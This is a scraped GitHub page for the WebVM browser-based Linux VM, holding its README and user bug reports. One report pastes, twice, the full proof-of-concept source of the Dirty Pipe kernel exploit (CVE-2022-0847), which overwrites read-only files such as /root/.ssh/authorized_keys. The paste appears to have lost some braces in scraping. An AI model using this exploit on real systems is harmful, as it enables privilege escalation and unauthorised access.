WebVM is a server-less virtual Linux environment running fully client-side in HTML5/WebAssembly.



This repository hosts the source code of the https://webvm.io live demo page.

WebVM is a server-less virtual Linux environment running fully client-side in HTML5/WebAssembly. In this demo, it runs an unmodified Debian distribution including many native development toolchains.

WebVM is powered by the CheerpX virtualization engine, and enables safe, sandboxed client-side execution of x86 binaries on any browser. CheerpX includes an x86-to-WebAssembly JIT compiler, a virtual block-based file system, and a Linux syscall emulator.

For more information: https://medium.com/leaningtech/webvm-client-side-x86-virtual-machines-in-the-browser-40a60170b361

Bugs and Issues

Please use Issues to report any bug.

Browsers support




✔️ ✔️ ✔️ ✔️

WebVM and CheerpX are compatible with any browser, both on Desktop (Chrome/Chromium, Edge, Firefox, Safari), and Mobile (Chrome, Safari), provided support for SAB is present, and the device has sufficient memory.


This project depends on xterm.js (https://xtermjs.org/) and on its add-on xterm-addon-fit

To update the xterm-related files do:

mkdir build
cd build
npm install --save xterm
npm install --save xterm-addon-fit
cd ../xterm
cp ../build/node_modules/xterm/lib/xterm.js .
cp ../build/node_modules/xterm/css/xterm.css .
cp ../build/node_modules/xterm-addon-fit/lib/xterm-addon-fit.js .
cd ..
rm -r build


Copyright (c) Leaning Technologies Limited. All rights reserved.

  • Command for Clang hangs while command for GCC returns immediately

    Command for Clang hangs while command for GCC returns immediately

    A command "gcc --version" is known and actioned

    A command "clang --version" (or just "clang") hangs seemingly forever

    A dummy command "bob" is correctly not recognised and reported on immediately, which does suggest that the command for Clang is recognised image

    opened by michael-mayes 10
  • Not loading in Firefox Ubuntu

    Not loading in Firefox Ubuntu

    Webvm.io is not loading inside Firefox 96.0 (64bit) in Ubuntu 20.04.3 LTS. This is error message I am seeing in browser console

    Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://disks.leaningtech.com/webvm_20220131.ext2. (Reason: CORS request did not succeed). Status code: (null).

    opened by anidotnet 8
  • Logo/mascot [nice to have]

    Logo/mascot [nice to have]

    Hi there!

    I'm thinking there should be a logo, or as the cool kids call it, a "favicon" for the website. Perhaps some ASCII art or a nice letter art? I can't draw but wanted to have the idea for considering. Thanks!

    opened by TheGamer1002 7
  • Filesystem data is dumped when `cat /bin` is executed

    Filesystem data is dumped when `cat /bin` is executed

                            __      __   _  __   ____  __       
                            \ \    / /__| |_\ \ / /  \/  | 
                             \ \/\/ / -_) '_ \ V /| |\/| | 
                              \_/\_/\___|_.__/\_/ |_|  |_|  
     |                                                                            |
     | WebVM is a server-less virtual Linux environment running fully client-side |
     | in HTML5/WebAssembly.                                                      |
     |                                                                            |
     | In this demo, it runs an unmodified Debian distribution including many     |
     | native development toolchains.                                             |
     |                                                                            |
     | WebVM is powered by the CheerpX virtualization engine, and enables safe,   |
     | sandboxed client-side execution of x86 binaries on any browser.            |
     |                                                                            |
     | CheerpX includes an x86-to-WebAssembly JIT compiler, a virtual block-based |
     | file system, and a Linux syscall emulator.                                 |
     |                                                                            |
     | For more information: https://medium.com/p/40a60170b361                    |
     |                                                                            |
     | GitHub  |  Issues  |  Gitter  |  Twitter  |  Latest News  |  About CheerpX |
     |                                                                            |
       Welcome to WebVM (build 20220201). If unsure, try these examples:
         python3 examples/python3/fibonacci.py 
         gcc -o helloworld examples/c/helloworld.c && ./helloworld
         objdump -d ./helloworld | less -M
         vim examples/c/helloworld.c
    user@:~$ ls
    user@:~$ cd /
    user@:/$ ls
    bin  boot  bootstrap  dev  etc  home  lib  lib64  libx32  lost+found  media  mnt  nbody.js  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
    user@:/$ cd /b
    bash: cd: /b: No such file or directory
    user@:/$ ./bootstrap/
    bash: ./bootstrap/: Is a directory
    user@:/$ echo 2>bin
    user@:/$ cat bin
    aptU    apt-cacheU      apt-cdromU
    cutW    dircolorsWdirnameW
    seqWsha1sumX    sha224sum!X     sha256sum"X     sha384sum$X     sha512sum%Xshred&X
    shidebconfidebconf-apt-progressidebconf-communicateidebconf-copydbidebconf-escapei debconf-set-selectionsi
    debconf-showTZ  run-partsUtempfileVZwhichYischrootZZsavelogcZ
    dpkg-divertZ dpkg-maintscript-helperZ
    findx[xargs[    catchsegv[getconf[getent[iconv[
    ldd[locale[     localedef[
    ^       captoinfo^      infotocap^reset^
    sed     _login
    `mount`umount`dmesg`findmnt `lsblk!`
    chrtF`delpartG` fallocateH`fincoreI`flockJ`getoptK`ioniceL`ipcmkM`ipcrmN`
    mesgX`nameiY`nsenterZ`partx[`prlimit\`  rename.ul]`
    networkctlpkY   systemctletwYsystemd-ask-passwordYsystemd-escapeYsystemd-inhibitkY systemd-machine-id-setupYsystemd-notifyd-Ysystemd-sysusers_systemd-tmpfilesFd(systemd-tty-ask-password-agentg-obusctlsto
    hostnamectleokernel-installpfo  localectlgo
    systemd-runo systemd-socket-activatetosystemd-stdio-bridgeo
    apt-sortpkgsi   bsd-writedpkcalendari
    select-editorg-nglsensible-editorelsensible-pagergudevadm-@m    helpztagspkg-newltaskselwnewnl
    fromXnodejspkX  python3.7mpeX
    zipwqYfunzip.da]i686-linux-gnu-ardr2b]i686-linux-gnu-as686c] i686-linux-gnu-c++filtd]i686-linux-gnu-dwpkge] i686-linux-gnu-elfedit.d^i686-linux-gnu-gprof^ i686-linux-gnu-ld.bfdlin^ i686-linux-gnu-ld.gold^i686-linux-gnu-nm-nei686-linux-gnu-addr2lineM^ranlibg-N^readelfbQ^stringsR^strippkg_^cpp-8lin` i686-linux-gnu-gcc-ar-8kagcc-8wp.\^i686-linux-gnu-cpp-8` i686-linux-gnu-gcc-nm-8.`$686-linux-gnu-gcc-ranlib-8n` i686-linux-gnu-gcov-8w?^     addr2lineg-ta$i686-linux-gnu-gcov-dump-88.a$i686-linux-gnu-gcov-tool-8v-gcc-ar-8gcc-nm-8a
    gcov-tool-8"amtrace.d#arpcgen$asotruss%asprofn.dag++-8linaluac50dpkg-newwaluajit.d!agencata     python2.7-tmpewalua50-8.dpkg-new`i686-linux-gnu-gcc-8ai686-linux-gnu-g++-8a
    luaca   pycompilepkgapython2oa
    pygettext2new2to3-2.74bpydocpkg5b       pygettext.dp<blspciew&b
    beefb   clang++-7olibclang-7b
    gcovb   gcov-dumpb      gcov-toolbbi586-linux-gnu-gccb i586-linux-gnu-gcc-arcovb i586-linux-gnu-gcc-nmtoob$i586-linux-gnu-gcc-ranlibu-gbi586-linux-gnu-gcovnb i586-linux-gnu-gcov-dumpb i586-linux-gnu-gcov-toolbi686-linux-gnu-gcc-rb i686-linux-gnu-gcc-arlinb i686-linux-gnu-gcc-nm586b$i686-linux-gnu-gcc-ranlibbbi686-linux-gnu-gcovlc i686-linux-gnu-gcov-dumpc i686-linux-gnu-gcov-toolfncurses6-configw
    llvm-c-test-7nlc-7m     llvm-ar-7ew-newemlli-7mlli-child-target-7v--nopt-7bc89-gccm     llvm-as-7g-nnllvm-bcanalyzer-7hufn
    llvm-cvtres-7wnllvm-cxxdump-7gnllvm-cxxfilt-7er n
    llvm-lto2-7n    llvm-mc-7kg-n
    llvm-rtdyld-7.dp#nmodextllvm-rc-7lvm nllvm-readelf-7!nllvm-readobj-7"nopy-7vmnllvm-objdump-7llvm-opt-report-7nnllvm-pdbutil-7ewnllvm-profdata-7-n
    sanstats-7an/n verify-uselistorder-7rc-0n
    vimmlnlsusbg-nyn        vim.basicstr|nxdg-user-dirs-update*genc2xspkg-newnewnvimdiffen
    c++mgi686-linux-gnu-g++.d#g perl5.28-i386-linux-gnu.)g
    bugpoint-7m llvm-PerfectShuffle-7+encguess,g
    h2xs.g  instmodsh/gjson_ppe0g   libnetcfgdpk1gperlbug2gperldoca3gperlivps1g
    perlthanksmpnew4gpiconvp.5gpl2pm6pod2html7gpod2manl8pod2text9g  pod2usagenew:g
    podcheckerkg;g  podselecthan<gproveg=g
    corelistdpkg-tmpo kernel-install.dpkg-newg<kernel-install.dpkg-tmpolocalectl.dpkg-newg8localectl.dpkg-tmporesolvectl.dpkg-newg<resolvectl.dpkg-tmpo systemd-analyze.dpkg-newg<systemd-analyze.dpkg-tmposystemd-cat.dpkg-newg<systemd-cat.dpkg-tmpo [email protected] [email protected] systemd-delta.dpkg-newgDsystemd-delta.dpkg-tmpo$systemd-detect-virt.dpkg-newgDsystemd-detect-virt.dpkg-tmpo [email protected] [email protected] systemd-path.dpkg-newg<systemd-path.dpkg-tmposystemd-run.dpkg-newgDsystemd-run.dpkg-tmpo( systemd-socket-activate.dpkg-newgP systemd-socket-activate.dpkg-tmpo(systemd-stdio-bridge.dpkg-newgDsystemd-stdio-bridge.dpkg-tmpotimedatectl.dpkg-newg4timedatectl.dpkg-tmpTpsystemd.dpkg-newUp8systemd.dpkg-tmpp [email protected] systemd-umount.dpkg-newp  systemd-umount.dpkg-tmpuser@:/$ 
    opened by hello-smile6 5
  • Attempting to cd into files works, and breaks current working directory display

    Attempting to cd into files works, and breaks current working directory display

    Calling cd with a file argument (rather than a directory) works, which is unexpected. It also seems to break the current working directory display if you try to cd out of it afterwards:

    user@:~/examples/nodejs$ cd nbody.js 
    user@:~/examples/nodejs/nbody.js$ ls
    ls: cannot open directory '.': Not a directory
    user@:~/examples/nodejs/nbody.js$ cd ../
    user@:~/examples/nodejs/nbody.js/../$ ls
    environment.js  nbody.js  primes.js  test.js  wasm.js
    Type: bug Priority: high 
    opened by Martin-Nyaga 4
  • apt-update: unexpected exit

    apt-update: unexpected exit

    Running apt update results in the following error being thrown:

    Unexpected exit @https://cheerpxdemos.leaningtech.com/publicdeploy/20220131_700/cxcore.js line 1 > WebAssembly.instantiate:wasm-function[4076]:0x22f9b8
    @https://cheerpxdemos.leaningtech.com/publicdeploy/20220131_700/cxcore.js line 1 > WebAssembly.instantiate:wasm-function[5696]:0x28a392
    @https://cheerpxdemos.leaningtech.com/publicdeploy/20220131_700/cxcore.js line 1 > WebAssembly.instantiate:wasm-function[1299]:0x5260e
    @https://cheerpxdemos.leaningtech.com/publicdeploy/20220131_700/cxcore.js line 1 > WebAssembly.instantiate:wasm-function[131]:0x747b
    @https://cheerpxdemos.leaningtech.com/publicdeploy/20220131_700/cxcore.js line 1 > WebAssembly.instantiate:wasm-function[4190]:0x2402ba


    It would be awesome if we could install new software into webvm. The vm could try to detect http requests from socket syscalls, and translate them to fetch requests, or use something like https://github.com/benjamincburns/websockproxy

    Type: bug Priority: high 
    opened by lovasoa 4
  • make: env: Timestamp out of range

    make: env: Timestamp out of range

    user@:~$ cd examples/c/
    user@:~/examples/c$ make
    cc  -o link link.c
    make: link: Timestamp out of range; substituting 1969-12-31 23:59:59.999999999
    cc  -o waitpid waitpid.c
    make: waitpid: Timestamp out of range; substituting 1969-12-31 23:59:59.999999999
    cc  -o env env.c
    make: env: Timestamp out of range; substituting 1969-12-31 23:59:59.999999999
    make: helloworld.c: Timestamp out of range; substituting 1969-12-31 23:59:59.999999999
    make: Warning: File 'helloworld.c' has modification time 1.6e+10 s in the future
    cc  -o helloworld helloworld.c
    make: helloworld: Timestamp out of range; substituting 1969-12-31 23:59:59.999999999
    cc  -o openat openat.c
    make: openat: Timestamp out of range; substituting 1969-12-31 23:59:59.999999999
    make: warning:  Clock skew detected.  Your build may be incomplete.
    Type: bug Priority: high 
    opened by domesticmouse 3
  • Source Code for running WebVM don't work on github pages

    Source Code for running WebVM don't work on github pages

    Just to check if it was possible to run WebVM on top of github pages I cloned your repository and copy the content inside a new branch.

    Regrettably, it says that "CheerpX could not start"


    url: https://alejandroreba.github.io/

    Are you aware of any limitation?

    opened by AlejandroReBa 2
  • Loading hangs on Safari 15.3 on macOS Big Sur 11.6.3

    Loading hangs on Safari 15.3 on macOS Big Sur 11.6.3

    With Content Blocker active for the site the entire tab froze and was unresponsive. Turning off content blocker seemed to allow the tab to unfreeze but still failed to load. Got most of the way but never generated your default error message.

    Subsequent launch in a new tab just came up blank. Hitting refresh showed a progress bar along the bottom of the address bar but page still remained blank until running a force reload but then it just gets back to a block cursor under the vim examples/c/helloworld.c line and never recovers.

    Seems to work OK with Edge Dev 99.0.1150.2 (Official build) Dev (x86_64) on macOS 11.6.3 albeit a bit slow to finish initializing. Similar hang on Firefox 96.0.3, and I had to turn off enhanced tracking to get to about the same point I got to in Safari. Seems to work OK on Chrome Version 98.0.4758.80 on macOS 11.6.3. Init was faster than Edge Dev.


    opened by enwinn 2
  • WebVM is actually not Linux but GNU

    WebVM is actually not Linux but GNU

    Semantics are important. WebVM does not run the Linux Kernel but has some of the GNU Distribution ported.

    It shouldn't advertise itself as Linux when it isn't even running it.

    Ref: https://www.gnu.org/gnu/linux-and-gnu.html

    opened by f0o 2
  • allow alternative network proxies?

    allow alternative network proxies?

    tailscale requires you to set up another device, AND sign in, to use it, perhaps a low-priority feature suggestion could be e.g. a websocket -> TCP proxy, which could be done using e.g. https://github.com/zquestz/ws-tcp-proxy (there's a lot of options for various proxies, I've not checked if this particular one is suitable)

    also, perhaps easier: allow running our OWN tailscale network, using https://github.com/juanfont/headscale which would allow using a fully self-hosted tailscale network (it has an embedded DERP server), it's perfectly fine to default to normal tailscale, but it'd be very nice to have an option to not depend on other services, so you could run it e.g. completely offline, but be able to access your LAN, for example

    there's a lot of options, but websocket -> tcp, or self-hosted tailscale network, are the first ones that come to mind (it's understandable you don't want responsibility for everyone's traffic, but also, why should we be required to trust a random third-party company, to get basic networking? not to mention the requirement to have a desktop or server that you can install tailscale onto, to HAVE any networking)

    opened by Jan69 1
  • clang++ never finishes compiling

    clang++ never finishes compiling

    I tried it for >12h and it never finished. I tried to compile the following source code.

    #include <iostream>
    #include <time.h>
    int main()
            unsigned long tmp, a = 0, b = 1;
            std::cout << "Started!" << std::endl;
            time_t t1 = time(NULL);
            for (unsigned long i = 0uL; i < 10000uL; ++i)
                for (unsigned long j = 0uL; j < 1000000uL; ++j)
                        tmp = b;
                        b = a + b;
                        a = tmp;
            time_t t2 = time(NULL);
            time_t dt = t2 - t1;
            std::cout << "Finished!" << std::endl;
            std::cout << "Result: " << b << std::endl;
            std::cout << "Time: " << dt << "s" << std::endl;
            return 0;
    opened by twischer 2
  • [Safari ?] Hangs randomly

    [Safari ?] Hangs randomly

    Basically the title, when I try to use vim or just the terminal, the website hangs, the only way to fix it is reloading. js console shows a debug message of the format Fault addr cb8bb1a4, ip 556ece35, tid 4 followed by Fault from Inode 28281.

    | Tool | Version| |-----|--------| |Safari| 15.4 (16613., 16613)| |Macos|Big Sur 11.6.2| |Model|M1 Macbook Air 2020|

    opened by Parura5726 6
  • Custom images

    Custom images

    Any ways to run my custom image, like in v86? Personally, I want my examples directory and utils like neofetch or pfetch. Don't find any documentation about customizations like this.

    btw there is any roadmap?

    opened by izzqz 0
  • https://dirtypipe.cm4all.com/ exploit crashes webvm

    https://dirtypipe.cm4all.com/ exploit crashes webvm

    Console log:

    Welcome. We appreciate curiosity, but be warned that keeping the DevTools open causes significant performance degradation and crashes.
    xterm.js:1 [Violation] 'requestAnimationFrame' handler took 103ms
    xterm.js:1 [Violation] 'requestAnimationFrame' handler took 108ms
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    9The resource <URL> was preloaded using link preload but not used within a few seconds from the window's load event. Please make sure it has an appropriate `as` value and it is preloaded intentionally.
    4cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    3cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    4cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    4cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    xterm.js:1 [Violation] 'requestAnimationFrame' handler took 81ms
    4cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cx.js:1 [Violation] 'load' handler took 202ms
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    4cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    4cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    2cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5414
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 TODO: CONSOLE IOCTL 5410
    cxcore.js:1 Fault addr 0, ip 5555c092, tid 31
    cxcore.js:1 Fault from Inode 23521
    xterm.js:1 [Violation] 'blur' handler took 333ms

    Terminal output:

                            __      __   _  __   ____  __       
                            \ \    / /__| |_\ \ / /  \/  | 
                             \ \/\/ / -_) '_ \ V /| |\/| | 
                              \_/\_/\___|_.__/\_/ |_|  |_|  
     |                                                                            |
     | WebVM is a server-less virtual Linux environment running fully client-side |
     | in HTML5/WebAssembly.                                                      |
     |                                                                            |
     | In this demo, it runs an unmodified Debian distribution including many     |
     | native development toolchains.                                             |
     |                                                                            |
     | WebVM is powered by the CheerpX virtualization engine, and enables safe,   |
     | sandboxed client-side execution of x86 binaries on any browser.            |
     |                                                                            |
     | CheerpX includes an x86-to-WebAssembly JIT compiler, a virtual block-based |
     | file system, and a Linux syscall emulator.                                 |
     |                                                                            |
     | For more information: https://medium.com/p/40a60170b361                    |
     |                                                                            |
     | GitHub  |  Issues  |  Gitter  |  Twitter  |  Latest News  |  About CheerpX |
     |                                                                            |
       Welcome to WebVM (build 20220726). If unsure, try these examples:
         python3 examples/python3/fibonacci.py 
         gcc -o helloworld examples/c/helloworld.c && ./helloworld
         objdump -d ./helloworld | less -M
         vim examples/c/helloworld.c
    user@:~$ ls
    examples  test.c
    user@:~$ cat test.c 
    /* SPDX-License-Identifier: GPL-2.0 */
     * Copyright 2022 CM4all GmbH / IONOS SE
     * author: Max Kellermann <[email protected]>
     * Proof-of-concept exploit for the Dirty Pipe
     * vulnerability (CVE-2022-0847) caused by an uninitialized
     * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
     * file contents in the page cache, even if the file is not permitted
     * to be written, immutable or on a read-only mount.
     * This exploit requires Linux 5.8 or later; the code path was made
     * reachable by commit f6dd975583bd ("pipe: merge
     * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
     * there before, it just provided an easy way to exploit it.
     * There are two major limitations of this exploit: the offset cannot
     * be on a page boundary (it needs to write one byte before the offset
     * to add a reference to this page to the pipe), and the write cannot
     * cross a page boundary.
     * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
     * Further explanation: https://dirtypipe.cm4all.com/
    #define _GNU_SOURCE
    #include <unistd.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/user.h>
    #ifndef PAGE_SIZE
    #define PAGE_SIZE 4096
     * Create a pipe where all "bufs" on the pipe_inode_info ring have the
     * PIPE_BUF_FLAG_CAN_MERGE flag set.
    static void prepare_pipe(int p[2])
            if (pipe(p)) abort();
            const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
            static char buffer[4096];
            /* fill the pipe completely; each pipe_buffer will now have
               the PIPE_BUF_FLAG_CAN_MERGE flag */
            for (unsigned r = pipe_size; r > 0;) {
                    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                    write(p[1], buffer, n);
                    r -= n;
            /* drain the pipe, freeing all pipe_buffer instances (but
               leaving the flags initialized) */
            for (unsigned r = pipe_size; r > 0;) {
                    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                    read(p[0], buffer, n);
                    r -= n;
            /* the pipe is now empty, and if somebody adds a new
               pipe_buffer without initializing its "flags", the buffer
               will be mergeable */
    int main(int argc, char **argv)
            if (argc != 4) {
                    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
                    return EXIT_FAILURE;
            /* dumb command-line argument parser */
            const char *const path = argv[1];
            loff_t offset = strtoul(argv[2], NULL, 0);
            const char *const data = argv[3];
            const size_t data_size = strlen(data);
            if (offset % PAGE_SIZE == 0) {
                    fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                    return EXIT_FAILURE;
            const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
            const loff_t end_offset = offset + (loff_t)data_size;
            if (end_offset > next_page) {
                    fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                    return EXIT_FAILURE;
            /* open the input file and validate the specified offset */
            const int fd = open(path, O_RDONLY); // yes, read-only! :-)
            if (fd < 0) {
                    perror("open failed");
                    return EXIT_FAILURE;
            struct stat st;
            if (fstat(fd, &st)) {
                    perror("stat failed");
                    return EXIT_FAILURE;
            if (offset > st.st_size) {
                    fprintf(stderr, "Offset is not inside the file\n");
                    return EXIT_FAILURE;
            if (end_offset > st.st_size) {
                    fprintf(stderr, "Sorry, cannot enlarge the file\n");
                    return EXIT_FAILURE;
            /* create the pipe with all flags initialized with
               PIPE_BUF_FLAG_CAN_MERGE */
            int p[2];
            /* splice one byte from before the specified offset into the
               pipe; this will add a reference to the page cache, but
               since copy_page_to_iter_pipe() does not initialize the
               "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
            ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
            if (nbytes < 0) {
                    perror("splice failed");
                    return EXIT_FAILURE;
            if (nbytes == 0) {
                    fprintf(stderr, "short splice\n");
                    return EXIT_FAILURE;
            /* the following write will not create a new pipe_buffer, but
               will instead write into the page cache, because of the
               PIPE_BUF_FLAG_CAN_MERGE flag */
            nbytes = write(p[1], data, data_size);
            if (nbytes < 0) {
                    perror("write failed");
                    return EXIT_FAILURE;
            if ((size_t)nbytes < data_size) {
                    fprintf(stderr, "short write\n");
                    return EXIT_FAILURE;
            printf("It worked!\n");
            return EXIT_SUCCESS;
    user@:~$ cat test.c | wc --help
    Usage: wc [OPTION]... [FILE]...
      or:  wc [OPTION]... --files0-from=F
    Print newline, word, and byte counts for each FILE, and a total line if
    more than one FILE is specified.  A word is a non-zero-length sequence of
    characters delimited by white space.
    With no FILE, or when FILE is -, read standard input.
    The options below may be used to select which counts are printed, always in
    the following order: newline, word, character, byte, maximum line length.
      -c, --bytes            print the byte counts
      -m, --chars            print the character counts
      -l, --lines            print the newline counts
          --files0-from=F    read input from the files specified by
                               NUL-terminated names in file F;
                               If F is - then read names from standard input
      -L, --max-line-length  print the maximum display width
      -w, --words            print the word counts
          --help     display this help and exit
          --version  output version information and exit
    GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
    Report wc translation bugs to <https://translationproject.org/team/>
    Full documentation at: <https://www.gnu.org/software/coreutils/wc>
    or available locally via: info '(coreutils) wc invocation'
    user@:~$ cat test.c | wc --lines
    user@:~$ cat test.c | head -n 156
    /* SPDX-License-Identifier: GPL-2.0 */
     * Copyright 2022 CM4all GmbH / IONOS SE
     * author: Max Kellermann <[email protected]>
     * Proof-of-concept exploit for the Dirty Pipe
     * vulnerability (CVE-2022-0847) caused by an uninitialized
     * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
     * file contents in the page cache, even if the file is not permitted
     * to be written, immutable or on a read-only mount.
     * This exploit requires Linux 5.8 or later; the code path was made
     * reachable by commit f6dd975583bd ("pipe: merge
     * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
     * there before, it just provided an easy way to exploit it.
     * There are two major limitations of this exploit: the offset cannot
     * be on a page boundary (it needs to write one byte before the offset
     * to add a reference to this page to the pipe), and the write cannot
     * cross a page boundary.
     * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
     * Further explanation: https://dirtypipe.cm4all.com/
    #define _GNU_SOURCE
    #include <unistd.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/user.h>
    #ifndef PAGE_SIZE
    #define PAGE_SIZE 4096
     * Create a pipe where all "bufs" on the pipe_inode_info ring have the
     * PIPE_BUF_FLAG_CAN_MERGE flag set.
    static void prepare_pipe(int p[2])
            if (pipe(p)) abort();
            const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
            static char buffer[4096];
            /* fill the pipe completely; each pipe_buffer will now have
               the PIPE_BUF_FLAG_CAN_MERGE flag */
            for (unsigned r = pipe_size; r > 0;) {
                    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                    write(p[1], buffer, n);
                    r -= n;
            /* drain the pipe, freeing all pipe_buffer instances (but
               leaving the flags initialized) */
            for (unsigned r = pipe_size; r > 0;) {
                    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                    read(p[0], buffer, n);
                    r -= n;
            /* the pipe is now empty, and if somebody adds a new
               pipe_buffer without initializing its "flags", the buffer
               will be mergeable */
    int main(int argc, char **argv)
            if (argc != 4) {
                    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
                    return EXIT_FAILURE;
            /* dumb command-line argument parser */
            const char *const path = argv[1];
            loff_t offset = strtoul(argv[2], NULL, 0);
            const char *const data = argv[3];
            const size_t data_size = strlen(data);
            if (offset % PAGE_SIZE == 0) {
                    fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                    return EXIT_FAILURE;
            const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
            const loff_t end_offset = offset + (loff_t)data_size;
            if (end_offset > next_page) {
                    fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                    return EXIT_FAILURE;
            /* open the input file and validate the specified offset */
            const int fd = open(path, O_RDONLY); // yes, read-only! :-)
            if (fd < 0) {
                    perror("open failed");
                    return EXIT_FAILURE;
            struct stat st;
            if (fstat(fd, &st)) {
                    perror("stat failed");
                    return EXIT_FAILURE;
            if (offset > st.st_size) {
                    fprintf(stderr, "Offset is not inside the file\n");
                    return EXIT_FAILURE;
            if (end_offset > st.st_size) {
                    fprintf(stderr, "Sorry, cannot enlarge the file\n");
                    return EXIT_FAILURE;
            /* create the pipe with all flags initialized with
               PIPE_BUF_FLAG_CAN_MERGE */
            int p[2];
            /* splice one byte from before the specified offset into the
               pipe; this will add a reference to the page cache, but
               since copy_page_to_iter_pipe() does not initialize the
               "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
            ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
            if (nbytes < 0) {
                    perror("splice failed");
                    return EXIT_FAILURE;
            if (nbytes == 0) {
                    fprintf(stderr, "short splice\n");
                    return EXIT_FAILURE;
            /* the following write will not create a new pipe_buffer, but
